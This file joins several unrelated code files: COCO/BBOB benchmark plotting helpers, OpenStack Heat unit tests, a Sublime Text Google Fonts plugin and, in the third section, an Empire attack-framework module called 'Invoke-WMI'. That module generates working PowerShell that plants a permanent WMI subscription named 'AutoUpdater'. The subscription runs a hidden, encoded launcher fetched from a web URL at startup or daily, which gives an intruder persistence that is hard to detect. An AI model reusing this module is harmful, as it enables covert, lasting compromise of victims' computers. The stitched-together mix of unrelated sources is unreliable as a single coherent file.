    # without it the header read "...divided bythe best ERT...".
    headerERT = 'Table showing the ERT in number of function evaluations divided by ' \
                'the best ERT measured during BBOB-2009 for dimension %d' % dimension
    f.write("\n<H2> %s </H2>\n" % headerERT)
    for ifun in range(1, 25):  # noiseless BBOB functions f1..f24
        f.write("\n<!--pptablesf%03d%02dDHtml-->\n" % (ifun, dimension))
    if genericsettings.isTab:
        key = 'bbobpptablesmanylegendexpensive' if genericsettings.isExpensive else 'bbobpptablesmanylegend'
        f.write(captionStringFormat % htmldesc.getValue('##' + key + str(dimension) + '##'))
def copy_js_files(outputdir):
    """Copies all ``.js`` files from the ``js`` folder shipped next to
    this module into `outputdir`.

    :param outputdir: destination directory (must exist)
    """
    js_folder = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'js')
    # 'file_name' instead of 'file' to avoid shadowing the builtin
    for file_name in os.listdir(js_folder):
        if file_name.endswith(".js"):
            shutil.copy(os.path.join(js_folder, file_name), outputdir)
def discretize_limits(limits, smaller_steps_limit=3.1):
    """return new limits with discrete values in k * 10**i with k in [1, 3].

    `limits` has len 2 and the new lower limit is always ``10**-0.2``.

    if `limits[1] / limits[0] < 10**smaller_steps_limits`, k == 3 is an
    additional choice.
    """
    ymin, ymax = limits
    ymin = np.max((ymin, 10**-0.2))
    ymax = int(ymax + 1)
    # smallest (slightly inflated) power of ten at or above ymax
    ymax_new = 10**np.ceil(np.log10(ymax)) * (1 + 1e-6)
    # use 3 * 10**i as upper limit when it suffices and the range is small
    if 3. * ymax_new / 10 > ymax and np.log10(ymax / ymin) < smaller_steps_limit:
        ymax_new *= 3. / 10
    # The lower limit is fixed (as documented above).  The original code
    # computed candidate values behind an always-false ``if 11 < 3`` guard
    # and then unconditionally overwrote them with 10**-0.2.
    ymin_new = 10**-0.2
    return ymin_new, ymax_new
def marker_positions(xdata, ydata, nbperdecade, maxnb,
                     ax_limits=None, y_transformation=None):
    """return randomized marker positions

    replacement for downsample, could be improved by becoming independent
    of axis limits?

    Markers are spread along the graph proportionally to the arc length
    covered in (log-x, transformed-y) space, with a random jitter so that
    markers of overlaid graphs do not coincide.

    :param xdata, ydata: data points of the graph (assumed monotonous --
        TODO confirm, see docstring of ``plotUnifLogXMarkers``)
    :param nbperdecade: desired number of markers per x-decade
    :param maxnb: hard upper bound on the number of markers
    :param ax_limits: axis limits as returned by ``plt.axis()``; current
        axis limits are used when ``None``
    :param y_transformation: callable applied to y-values for the spacing
        computation only (identity when ``None``)
    :returns: two lists ``(xpos, ypos)`` of marker coordinates
    """
    if ax_limits is None: # use current axis limits
        ax_limits = plt.axis()
    tfy = y_transformation
    if tfy is None:
        tfy = lambda x: x # identity
    # data extent in log-x and transformed-y, clipped against the axis box;
    # the + 0.5 offsets guard against log10(0)
    xdatarange = np.log10(max([max(xdata), ax_limits[0], ax_limits[1]]) + 0.5) - \
                 np.log10(min([min(xdata), ax_limits[0], ax_limits[1]]) + 0.5) #np.log10(xdata[-1]) - np.log10(xdata[0])
    ydatarange = tfy(max([max(ydata), ax_limits[2], ax_limits[3]]) + 0.5) - \
                 tfy(min([min(ydata), ax_limits[2], ax_limits[3]]) + 0.5) # tfy(ydata[-1]) - tfy(ydata[0])
    # nbperdecade markers per covered x-decade, capped at maxnb;
    # the 1e-99 keeps the ceil() argument strictly positive
    nbmarkers = np.min([maxnb, nbperdecade +
                        np.ceil(nbperdecade * (1e-99 + np.abs(np.log10(max(xdata)) - np.log10(min(xdata)))))])
    # relative arc length contributed by each segment between data points
    probs = np.abs(np.diff(np.log10(xdata))) / xdatarange + \
            np.abs(np.diff(tfy(ydata))) / ydatarange
    xpos = []
    ypos= []
    if sum(probs) > 0:
        xoff = np.random.rand() / nbmarkers  # random phase of the marker grid
        probs /= sum(probs)
        cum = np.cumsum(probs)
        for xact in np.arange(0, 1, 1./nbmarkers):
            # jittered target position within the current grid cell
            pos = xoff + xact + (1./nbmarkers) * (0.3 + 0.4 * np.random.rand())
            idx = np.abs(cum - pos).argmin() # index of closest value
            xpos.append(xdata[idx])
            ypos.append(ydata[idx])
    # the last data point always gets a marker
    xpos.append(xdata[-1])
    ypos.append(ydata[-1])
    return xpos, ypos
def plotUnifLogXMarkers(x, y, nbperdecade, logscale=False, **kwargs):
    """Proxy plot function: markers are evenly spaced on the log x-scale

    Remark/TODO: should be called plot_with_unif_markers!? Here is where
    the ECDF plot "done in pprldmany" actually happens.

    Unlike ``matplotlib.pyplot.plot``, which places markers on the data
    points, this draws the line once and then overlays markers at
    positions regularly spread over the log x-scale.

    Returns a list of ``lines.Line2D`` objects: the plain line first,
    then the marker-only artists, and finally a label-carrying artist.

    Only works with monotonous graphs.
    """
    artists = plt.plot(x, y, **kwargs)  # shouldn't this be done in the calling code?
    if len(x) > 0 and 'marker' in kwargs:
        # x2, y2 = downsample(x, y)
        marker_x, marker_y = marker_positions(x, y, nbperdecade, 19, plt.axis(),
                                              np.log10 if logscale else None)
        marker_artists = plt.plot(marker_x, marker_y)
        for artist in marker_artists:
            artist.update_from(artists[0])  # inherit color, width, ... from the line
        plt.setp(marker_artists, linestyle='', label='')
        artists.extend(marker_artists)
    if 'label' in kwargs:
        # invisible artist that carries marker *and* line style for the legend
        label_artists = plt.plot([], [], **kwargs)
        for artist in label_artists:
            artist.update_from(artists[0])
        artists.extend(label_artists)
        plt.setp(artists[0], marker='', label='')
    return artists
def consecutiveNumbers(data, prefix = ''):
    """Groups a sequence of integers into ranges of consecutive numbers.

    If the prefix is set then it is placed before each number, e.g.::

        consecutiveNumbers([0, 1, 2, 4, 5, 7, 8, 9])      -> '0-2, 4, 5, 7-9'
        consecutiveNumbers([0, 1, 2, 4, 5, 7, 8, 9], 'f') -> 'f0-f2, f4, f5, f7-f9'

    A run is only collapsed into a range when it contains at least three
    numbers (so [4, 5] stays "4, 5").
    """
    pieces = []
    for group in groupByRange(data):
        labels = [prefix + str(number) for number in group]
        if len(group) > 2:
            # long enough run: render as "first-last"
            pieces.append('-'.join((labels[0], labels[-1])))
        else:
            pieces.append(', '.join(labels))
    return ', '.join(pieces)
def groupByRange(data):
    """Groups a sequence of integers into ranges of consecutive numbers.

    Helper function of consecutiveNumbers(data), returns a list of lists.

    The key to the solution is differencing with a range so that
    consecutive numbers all appear in same group.

    Useful for determining ranges of functions.

    Ref: http://docs.python.org/release/3.0.1/library/itertools.html
    """
    res = []
    # The original key was the tuple-parameter lambda ``lambda (i,x): i-x``,
    # which is a SyntaxError on Python 3; indexing the pair works on both.
    for _k, g in groupby(enumerate(data), lambda i_x: i_x[0] - i_x[1]):
        res.append(list(i for i in map(itemgetter(1), g)))
    return res
def logxticks(limits=(-np.inf, np.inf)):
    """Modify log-scale figure xticks from 10^i to i for values with the
    ``limits`` and (re-)sets the current xlim() thereby turning autoscale
    off (if it was on).

    This is to have xticks that are more visible.

    Modifying the x-limits of the figure after calling this method will
    not update the ticks.

    Please make sure the xlabel is changed accordingly.

    :param limits: pair (low, high); only ticks strictly within get a
        label.  A tuple default replaces the original mutable-list
        default (never mutated here, but a tuple removes the hazard).
    """
    _xticks = plt.xticks()
    xlims = plt.xlim()
    newxticks = []
    for j in _xticks[0]:
        if j > limits[0] and j < limits[1]:  # tick annotations only within the limits
            newxticks.append('%d' % round(np.log10(j)))
        else:
            newxticks.append('')
    plt.xticks(_xticks[0], newxticks)  # this changes the limits (only in newer versions of mpl?)
    plt.xlim(xlims[0], xlims[1])
    # TODO: check the xlabel is changed accordingly?
def beautify():
    """Customize the current figure: log y-scale, grid, and y-tick labels
    showing the exponent (log10) instead of the raw value."""
    # TODO: what is this function for?
    axes = plt.gca()
    axes.set_yscale("log")
    axes.grid(True)
    # keep the upper y-limit, pin the lower one to the default
    _ymin, ymax = plt.ylim()
    plt.ylim(ymin=10**-0.2, ymax=ymax)
    # relabel ticks with their (rounded) base-10 exponent
    exponent_labels = ['%d' % round(np.log10(tick)) for tick in axes.get_yticks()]
    axes.set_yticklabels(exponent_labels)
    axes.set_ylabel('log10 of ERT')
def generateData(dataSet, targetFuncValue):
    """Returns an array of results to be plotted.

    1st column is ert, 2nd is the number of success, 3rd the success
    rate, 4th the sum of the number of function evaluations, and
    finally the median on successful runs.
    """
    # walk dataSet.evals from the last (worst) target upwards and keep the
    # last row whose target value is still <= targetFuncValue
    it = iter(reversed(dataSet.evals))
    i = next(it)  # builtin next() works on Python 2.6+ and 3; it.next() is 2-only
    prev = np.array([np.nan] * len(i))
    while i[0] <= targetFuncValue:
        prev = i
        try:
            i = next(it)
        except StopIteration:
            break
    data = prev[1:].copy()  # keep only the number of function evaluations.
    # was up to rev4997: succ = (np.isnan(data) == False) # better: ~np.isnan(data)
    succ = np.isfinite(data)
    if succ.any():
        med = toolsstats.prctile(data[succ], 50)[0]
        # Line above was modified at rev 3050 to make sure that we consider only
        # successful trials in the median
    else:
        med = np.nan
    # prepare to compute runlengths / ERT with restarts (AKA SP1):
    # unsuccessful trials count with their full budget
    data[np.isnan(data)] = dataSet.maxevals[np.isnan(data)]
    res = []
    res.extend(toolsstats.sp(data, issuccessful=succ, allowinf=False))
    res.append(np.mean(data))  # mean(FE)
    res.append(med)
    return np.array(res)
def plot(dsList, _valuesOfInterest=(10, 1, 1e-1, 1e-2, 1e-3, 1e-5, 1e-8),
         isbyinstance=True, kwargs={}):
    """From a DataSetList, plot a graph. Not in use and superseeded by ppfigdim.main!?

    :param dsList: DataSetList whose data is plotted
    :param _valuesOfInterest: target function values, processed from the
        largest to the smallest
    :param isbyinstance: unused; kept for backward compatibility
    :param kwargs: keyword arguments passed through to ``plt.plot``
        (only read here, so the mutable default is harmless)
    :returns: list of matplotlib artists added to the current figure
    """
    #set_trace()
    res = []
    valuesOfInterest = list(_valuesOfInterest)
    valuesOfInterest.sort(reverse=True)

    def transform(dsList):
        """Create dictionary of instances."""
        class StrippedUpDS():
            """Data Set stripped up of everything."""
            pass
        res = {}
        for i in dsList:
            dictinstance = i.createDictInstance()
            # .items() instead of the Python-2-only .iteritems()
            for j, idx in dictinstance.items():
                tmp = StrippedUpDS()
                idxs = list(k + 1 for k in idx)
                idxs.insert(0, 0)  # column 0 (target values) is always kept
                tmp.evals = i.evals[:, np.r_[idxs]].copy()
                tmp.maxevals = i.maxevals[np.ix_(idx)].copy()
                res.setdefault(j, [])
                res.get(j).append(tmp)
        return res

    for i in range(len(valuesOfInterest)):
        succ = []
        unsucc = []
        displaynumber = []
        dictX = transform(dsList)
        for x in sorted(dictX.keys()):
            dsListByX = dictX[x]
            for j in dsListByX:
                tmp = generateData(j, valuesOfInterest[i])
                if tmp[2] > 0:  # Number of success is larger than 0
                    succ.append(np.append(x, tmp))
                    if tmp[2] < j.nbRuns():
                        displaynumber.append((x, tmp[0], tmp[2]))
                else:
                    unsucc.append(np.append(x, tmp))
        if succ:
            tmp = np.vstack(succ)
            #ERT
            res.extend(plt.plot(tmp[:, 0], tmp[:, 1], **kwargs))
            #median
            tmp2 = plt.plot(tmp[:, 0], tmp[:, -1], **kwargs)
            plt.setp(tmp2, linestyle='', marker='+', markersize=30, markeredgewidth=5)
            #, color=colors[i], linestyle='', marker='+', markersize=30, markeredgewidth=5))
            res.extend(tmp2)
        # To have the legend displayed whatever happens with the data.
        tmp = plt.plot([], [], **kwargs)
        plt.setp(tmp, label=' %+d' % (np.log10(valuesOfInterest[i])))
        res.extend(tmp)
    #Only for the last target function value
    if unsucc:
        tmp = np.vstack(unsucc)  # tmp[:, 0] needs to be sorted!
        res.extend(plt.plot(tmp[:, 0], tmp[:, 1], **kwargs))
    if displaynumber:  # displayed only for the smallest valuesOfInterest
        for j in displaynumber:
            t = plt.text(j[0], j[1]*1.85, "%.0f" % j[2],
                         horizontalalignment="center",
                         verticalalignment="bottom")
            res.append(t)
    return res
| |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import six
from heat.common import exception as exc
from heat.common import template_format
from heat.engine import stack
from heat.engine import template
from heat.tests import common
from heat.tests import utils
class SoftwareComponentTest(common.HeatTestCase):
    """Tests the create/delete handlers and attribute resolution of the
    OS::Heat::SoftwareComponent resource, with the RPC client mocked out."""

    def setUp(self):
        super(SoftwareComponentTest, self).setUp()
        self.ctx = utils.dummy_context()
        tpl = '''
        heat_template_version: 2013-05-23
        resources:
          mysql_component:
            type: OS::Heat::SoftwareComponent
            properties:
              configs:
                - actions: [CREATE]
                  config: |
                    #!/bin/bash
                    echo "Create MySQL"
                  tool: script
                - actions: [UPDATE]
                  config: |
                    #!/bin/bash
                    echo "Update MySQL"
                  tool: script
              inputs:
                - name: mysql_port
              outputs:
                - name: root_password
        '''
        self.template = template_format.parse(tpl)
        self.stack = stack.Stack(
            self.ctx, 'software_component_test_stack',
            template.Template(self.template))
        self.component = self.stack['mysql_component']
        self.rpc_client = mock.MagicMock()
        self.component._rpc_client = self.rpc_client

    def test_handle_create(self):
        config_id = 'c8a19429-7fde-47ea-a42f-40045488226c'
        value = {'id': config_id}
        self.rpc_client.create_software_config.return_value = value
        props = dict(self.component.properties)
        self.component.handle_create()
        # the configs list must be wrapped into the 'config' payload
        self.rpc_client.create_software_config.assert_called_with(
            self.ctx,
            group='component',
            name=None,
            inputs=props['inputs'],
            outputs=props['outputs'],
            config={'configs': props['configs']},
            options=None)
        self.assertEqual(config_id, self.component.resource_id)

    def test_handle_delete(self):
        # BUG FIX: the original set ``self.resource_id = None`` on the test
        # case itself -- a dead assignment; the intent is to clear the
        # resource id of the component under test.
        self.component.resource_id = None
        self.assertIsNone(self.component.handle_delete())
        config_id = 'c8a19429-7fde-47ea-a42f-40045488226c'
        self.component.resource_id = config_id
        self.rpc_client.delete_software_config.return_value = None
        self.assertIsNone(self.component.handle_delete())
        # an already-deleted config must not make delete fail
        self.rpc_client.delete_software_config.side_effect = exc.NotFound
        self.assertIsNone(self.component.handle_delete())

    def test_resolve_attribute(self):
        self.assertIsNone(self.component._resolve_attribute('others'))
        self.component.resource_id = None
        self.assertIsNone(self.component._resolve_attribute('configs'))
        self.component.resource_id = 'c8a19429-7fde-47ea-a42f-40045488226c'
        configs = self.template['resources']['mysql_component'
                                             ]['properties']['configs']
        # configs list is stored in 'config' property of SoftwareConfig
        value = {'config': {'configs': configs}}
        self.rpc_client.show_software_config.return_value = value
        self.assertEqual(configs, self.component._resolve_attribute('configs'))
        # a vanished config resolves to None instead of raising
        self.rpc_client.show_software_config.side_effect = exc.NotFound
        self.assertIsNone(self.component._resolve_attribute('configs'))
class SoftwareComponentValidationTest(common.HeatTestCase):
    """Scenario-driven validation tests for OS::Heat::SoftwareComponent.

    Each scenario provides a resource ``snippet`` plus the expected
    validation outcome: ``err`` is the exception class raised by
    ``stack.validate()`` (or None for a valid snippet) and ``err_msg`` is
    a substring expected in the exception text.
    """

    # (scenario_name, dict(snippet=..., err=..., err_msg=...)) tuples;
    # testscenarios runs test_properties_schema once per entry.
    scenarios = [
        (
            'component_full',
            dict(snippet='''
                 component:
                   type: OS::Heat::SoftwareComponent
                   properties:
                     configs:
                       - actions: [CREATE]
                         config: |
                           #!/bin/bash
                           echo CREATE $foo
                         tool: script
                     inputs:
                       - name: foo
                     outputs:
                       - name: bar
                     options:
                       opt1: blah
                 ''',
                 err=None,
                 err_msg=None)
        ),
        (
            'no_input_output_options',
            dict(snippet='''
                 component:
                   type: OS::Heat::SoftwareComponent
                   properties:
                     configs:
                       - actions: [CREATE]
                         config: |
                           #!/bin/bash
                           echo CREATE $foo
                         tool: script
                 ''',
                 err=None,
                 err_msg=None)
        ),
        (
            'wrong_property_config',
            dict(snippet='''
                 component:
                   type: OS::Heat::SoftwareComponent
                   properties:
                     config: #!/bin/bash
                     configs:
                       - actions: [CREATE]
                         config: |
                           #!/bin/bash
                           echo CREATE $foo
                         tool: script
                 ''',
                 err=exc.StackValidationFailed,
                 err_msg='Unknown Property config')
        ),
        (
            'missing_configs',
            dict(snippet='''
                 component:
                   type: OS::Heat::SoftwareComponent
                   properties:
                     inputs:
                       - name: foo
                 ''',
                 err=exc.StackValidationFailed,
                 err_msg='Property configs not assigned')
        ),
        (
            'empty_configs',
            dict(snippet='''
                 component:
                   type: OS::Heat::SoftwareComponent
                   properties:
                     configs:
                 ''',
                 err=exc.StackValidationFailed,
                 err_msg='resources.component.properties.configs: '
                         'length (0) is out of range (min: 1, max: None)')
        ),
        (
            'invalid_configs',
            dict(snippet='''
                 component:
                   type: OS::Heat::SoftwareComponent
                   properties:
                     configs:
                       actions: [CREATE]
                       config: #!/bin/bash
                       tool: script
                 ''',
                 err=exc.StackValidationFailed,
                 err_msg='is not a list')
        ),
        (
            'config_empty_actions',
            dict(snippet='''
                 component:
                   type: OS::Heat::SoftwareComponent
                   properties:
                     configs:
                       - actions: []
                         config: #!/bin/bash
                         tool: script
                 ''',
                 err=exc.StackValidationFailed,
                 err_msg='component.properties.configs[0].actions: '
                         'length (0) is out of range (min: 1, max: None)')
        ),
        (
            'multiple_configs_per_action_single',
            dict(snippet='''
                 component:
                   type: OS::Heat::SoftwareComponent
                   properties:
                     configs:
                       - actions: [CREATE]
                         config: #!/bin/bash
                         tool: script
                       - actions: [CREATE]
                         config: #!/bin/bash
                         tool: script
                 ''',
                 err=exc.StackValidationFailed,
                 err_msg='Defining more than one configuration for the same '
                         'action in SoftwareComponent "component" is not '
                         'allowed.')
        ),
        (
            'multiple_configs_per_action_overlapping_list',
            dict(snippet='''
                 component:
                   type: OS::Heat::SoftwareComponent
                   properties:
                     configs:
                       - actions: [CREATE, UPDATE, RESUME]
                         config: #!/bin/bash
                         tool: script
                       - actions: [UPDATE]
                         config: #!/bin/bash
                         tool: script
                 ''',
                 err=exc.StackValidationFailed,
                 err_msg='Defining more than one configuration for the same '
                         'action in SoftwareComponent "component" is not '
                         'allowed.')
        ),
    ]

    def setUp(self):
        super(SoftwareComponentValidationTest, self).setUp()
        self.ctx = utils.dummy_context()
        # splice the per-scenario resource snippet into a minimal template
        tpl = '''
        heat_template_version: 2013-05-23
        resources:
          %s
        ''' % self.snippet
        self.template = template_format.parse(tpl)
        self.stack = stack.Stack(
            self.ctx, 'software_component_test_stack',
            template.Template(self.template))
        self.component = self.stack['component']
        self.component._rpc_client = mock.MagicMock()

    def test_properties_schema(self):
        # valid scenarios validate cleanly; invalid ones must raise the
        # expected exception containing the expected message fragment
        if self.err:
            err = self.assertRaises(self.err, self.stack.validate)
            if self.err_msg:
                self.assertIn(self.err_msg, six.text_type(err))
        else:
            self.assertIsNone(self.stack.validate())
| |
import os
from lib.common import helpers
class Module:
    """Empire persistence module wrapping PowerSploit's Invoke-WMI:
    installs (or removes) a permanent WMI event subscription that runs a
    launcher fetched from the web, triggered daily or at startup."""

    def __init__(self, mainMenu, params=None):
        # static metadata shown by the framework
        self.info = {
            'Name': 'Invoke-WMI',

            'Author': ['@mattifestation', '@harmj0y', '@tristandostaler'],

            'Description': ('Persist a stager (or script) using a permanent WMI subscription. This has a difficult detection/removal rating.'),

            'Background' : False,

            'OutputExtension' : None,

            'NeedsAdmin' : True,

            'OpsecSafe' : False,

            'Language' : 'powershell',

            'MinLanguageVersion' : '2',

            'Comments': [
                'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
            ]
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Launcher' : {
                'Description'   :   'Launcher string.',
                'Required'      :   True,
                'Value'         :   'powershell -noP -sta -w 1 -enc '
            },
            #'Listener' : {
            #    'Description'   :   'Listener to use.',
            #    'Required'      :   False,
            #    'Value'         :   ''
            #},
            'DailyTime' : {
                'Description'   :   'Daily time to trigger the script (HH:mm).',
                'Required'      :   False,
                'Value'         :   ''
            },
            'AtStartup' : {
                'Description'   :   'Switch. Trigger script (within 5 minutes) of system startup.',
                'Required'      :   False,
                'Value'         :   'True'
            },
            'SubName' : {
                'Description'   :   'Name to use for the event subscription.',
                'Required'      :   True,
                'Value'         :   'AutoUpdater'
            },
            'ExtFile' : {
                'Description'   :   'Use an external file for the payload instead of a stager.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'Cleanup' : {
                'Description'   :   'Switch. Cleanup the trigger and any script from specified location.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'WebFile' : {
                'Description'   :   'The location of the launcher.bat file to fetch over the network/web',
                'Required'      :   True,
                'Value'         :   'http://127.0.0.1/launcher.bat'
            }
            #'UserAgent' : {
            #    'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
            #    'Required'      :   False,
            #    'Value'         :   'default'
            #},
            #'Proxy' : {
            #    'Description'   :   'Proxy to use for request (default, none, or other).',
            #    'Required'      :   False,
            #    'Value'         :   'default'
            #},
            #'ProxyCreds' : {
            #    'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
            #    'Required'      :   False,
            #    'Value'         :   'default'
            #}
        }

        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # 'params or []' avoids the original shared mutable default argument
        for param in (params or []):
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value

    def generate(self):
        """Build and return the PowerShell script that installs (or, with
        Cleanup set, removes) the WMI persistence subscription."""
        #listenerName = self.options['Listener']['Value']
        launcher_prefix = self.options['Launcher']['Value']

        # trigger options
        dailyTime = self.options['DailyTime']['Value']
        atStartup = self.options['AtStartup']['Value']
        subName = self.options['SubName']['Value']

        # management options
        extFile = self.options['ExtFile']['Value']
        cleanup = self.options['Cleanup']['Value']
        webFile = self.options['WebFile']['Value']

        # staging options
        #userAgent = self.options['UserAgent']['Value']
        #proxy = self.options['Proxy']['Value']
        #proxyCreds = self.options['ProxyCreds']['Value']

        statusMsg = ""
        locationString = ""

        if cleanup.lower() == 'true':
            # commands to remove the WMI filter and subscription
            script = "Get-WmiObject __eventFilter -namespace root\subscription -filter \"name='"+subName+"'\"| Remove-WmiObject;"
            script += "Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter \"name='"+subName+"'\" | Remove-WmiObject;"
            script += "Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Object { $_.filter -match '"+subName+"'} | Remove-WmiObject;"
            script += "'WMI persistence removed.'"
            return script

        if extFile != '':
            # read in an external file as the payload and build a
            #   base64 encoded version as encScript
            if os.path.exists(extFile):
                f = open(extFile, 'r')
                fileData = f.read()
                f.close()

                # unicode-base64 encode the script for -enc launching
                encScript = helpers.enc_powershell(fileData)
                statusMsg += "using external file " + extFile
            else:
                # print-as-function works on both Python 2 and 3
                print(helpers.color("[!] File does not exist: " + extFile))
                return ""
        else:
            # generate the PowerShell one-liner with all of the proper options set
            launcher = self.mainMenu.stagers.generate_launcher_fetcher(language='powershell', encode=True, webFile=webFile, launcher=launcher_prefix)
            encScript = launcher.split(" ")[-1]
            statusMsg += "using launcher_fetcher"

        # sanity check to make sure we haven't exceeded the powershell -enc 8190 char max
        if len(encScript) > 8190:
            print(helpers.color("[!] Warning: -enc command exceeds the maximum of 8190 characters."))
            return ""

        # built the command that will be triggered
        triggerCmd = "$($Env:SystemRoot)\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -enc " + encScript

        if dailyTime != '':
            parts = dailyTime.split(":")
            if len(parts) < 2:
                print(helpers.color("[!] Please use HH:mm format for DailyTime"))
                return ""
            hour = parts[0]
            minutes = parts[1]
            # create the WMI event filter for a system time
            script = "$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='"+subName+"';EventNameSpace='root\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = "+hour+" AND TargetInstance.Minute= "+minutes+" GROUP WITHIN 60\"};"
            statusMsg += " WMI subscription daily trigger at " + dailyTime + "."
        else:
            # create the WMI event filter for OnStartup
            script = "$Filter=Set-WmiInstance -Class __EventFilter -Namespace \"root\\subscription\" -Arguments @{name='"+subName+"';EventNameSpace='root\CimV2';QueryLanguage=\"WQL\";Query=\"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325\"};"
            statusMsg += " with OnStartup WMI subsubscription trigger."

        # add in the event consumer to launch the encrypted script contents
        script += "$Consumer=Set-WmiInstance -Namespace \"root\\subscription\" -Class 'CommandLineEventConsumer' -Arguments @{ name='"+subName+"';CommandLineTemplate=\""+triggerCmd+"\";RunInteractively='false'};"

        # bind the filter and event consumer together
        script += "Set-WmiInstance -Namespace \"root\subscription\" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer} | Out-Null;"

        script += "'WMI persistence established "+statusMsg+"'"

        return script
| |
import sublime, sublime_plugin
import threading, urllib, json, re
API_url = 'https://www.googleapis.com/webfonts/v1/webfonts?key='
style_url = 'http://fonts.googleapis.com/css?family='
class merge_fontsCommand(sublime_plugin.TextCommand):
    """Merges multiple fonts.googleapis.com <link> tags in the current
    view into a single <link> tag carrying all font families."""

    def run(self, edit):
        self.tags = self.find_tags()
        print(self.tags)  # DEBUG

    def find_tags(self):
        """
        Finds the link tags inside the <head> that reference fonts.googleapis.com
        and merges them in place; always returns None.
        """
        regfull = '<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css\?family=.*/>'
        regpart = '(?<=<link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css\?family=).*(?=")'
        linklist = self.view.find_all(regfull)
        linkparts = self.view.find_all(regpart)
        if len(linklist) <= 1:
            # Nothing to merge.  BUG FIX: this guard must run before the
            # linkparts[0] access below, which raised IndexError on views
            # without any matching <link> tag.
            return
        startpos = linkparts[0].end()
        linklist.reverse()
        edit = self.view.begin_edit()
        fontlist = []
        for f in linkparts:
            fontlist.append(self.view.substr(f))
        # erase all but the first tag (in reverse so regions stay valid) ...
        for link in linklist[:-1]:
            self.view.erase(edit, link)
        # ... and append the extra families to the surviving tag
        addstring = '|' + '|'.join(fontlist[1:])
        self.view.insert(edit, startpos, addstring)
        self.view.set_status('merge_fonts', 'Merged %s fonts' % (len(linklist)))
        self.view.end_edit(edit)
        return

    def find_fonts(self, tags):
        """
        Finds the fonts that are embedded in the <link> tags and their referencing Weights
        output format { 'FontFamily':['weight', 'weight']}
        """
        pass

    def merge(self, fontlist):
        """
        Makes a new <link> tag out of the requested fontslist and removes the other -now outdated- <link> tags
        """
        pass
class add_effectCommand(sublime_plugin.TextCommand):
    """Shows a quick panel of Google font effects loaded from a bundled
    JSON file (insertion of the picked effect is not implemented yet)."""

    def run(self, edit):
        self.effects = self.load_effects()
        self.makelist(self.effects)

    def load_effects(self):
        """Load and return the effect definitions from font-effects.json."""
        self.effects_filename = 'font-effects.json'
        # 'with' closes the handle deterministically; the original kept the
        # file open for the plugin's lifetime
        with open(self.effects_filename, 'r') as effects_file:
            effects = json.load(effects_file)
        return effects

    def makelist(self, effects):
        """Build [title, subtitle] entries and show them in a quick panel."""
        effectslist = []
        for effect in effects:
            effectslist.append([effect[0], 'Effect class: ' + effect[1]])
        window = sublime.active_window()
        window.show_quick_panel(effectslist, self.insert)

    def insert(self, picked):
        """Quick-panel callback; `picked` is -1 when the panel was cancelled."""
        if picked == -1:
            return
        # TODO: actually insert self.effects[picked] into the view; the
        # original evaluated it as a no-op expression and only printed.
        print(picked)
class fetch_fontsCommand(sublime_plugin.TextCommand):
    """Fetches the Google webfont list in a background thread and inserts
    a <link> tag for the picked font/weight at the cursor."""

    def load_settings(self):
        """Load this plugin's .sublime-settings file."""
        self.settings_file = '%s.sublime-settings' % __name__
        self.settings = sublime.load_settings(self.settings_file)

    def run(self, edit):
        self.load_settings()
        thread = fetchfontsApiCall(self.settings)
        thread.start()
        self.handle_thread(thread)

    def handle_thread(self, thread, i=0, direction=1):
        """Poll `thread`; animate a status-bar progress bar while it runs,
        then show the fetched fonts in a quick panel.

        'direction' renamed from 'dir', which shadowed the builtin.
        """
        keep_alive = False
        if thread.is_alive():
            keep_alive = True
        if keep_alive:
            # bounce the '=' between 8 positions: [  =     ] etc.
            before = i % 8
            after = (7) - before
            if not after:
                direction = -1
            if not before:
                direction = 1
            i += direction
            self.view.set_status('fetchfonts', 'Fetching font list [%s=%s]' % (' ' * before, ' ' * after))
            sublime.set_timeout(lambda: self.handle_thread(thread, i, direction), 100)
            return
        self.fonts = thread.fonts
        window = sublime.active_window()
        window.show_quick_panel(self.fonts, self.insert)

    def insert(self, picked):
        """Quick-panel callback: build and insert the <link> tag for the
        picked entry; `picked` is -1 when the panel was cancelled."""
        if picked == -1:
            return
        # third column holds the command string 'ADD F:<family>&W:<weights>'
        command = self.fonts[picked][2]
        match = re.search('ADD F:([\w -]+)&W:([\w, -]+)', command)
        font = match.group(1)
        font = re.sub('\s', '+', font)  # URL-encode spaces in the family name
        styles = match.group(2)
        prefix = '<link rel="stylesheet" type="text/css" href="'
        affix = '" />'
        line = prefix + style_url + font + ':' + styles + affix
        sel = self.view.sel()[0].begin()
        edit = self.view.begin_edit()
        self.view.insert(edit, sel, line)
        self.view.end_edit(edit)
class fetchfontsApiCall(threading.Thread):
    """
    Class that functions as a thread. Is called for the fetching of the Webfonts list.
    """
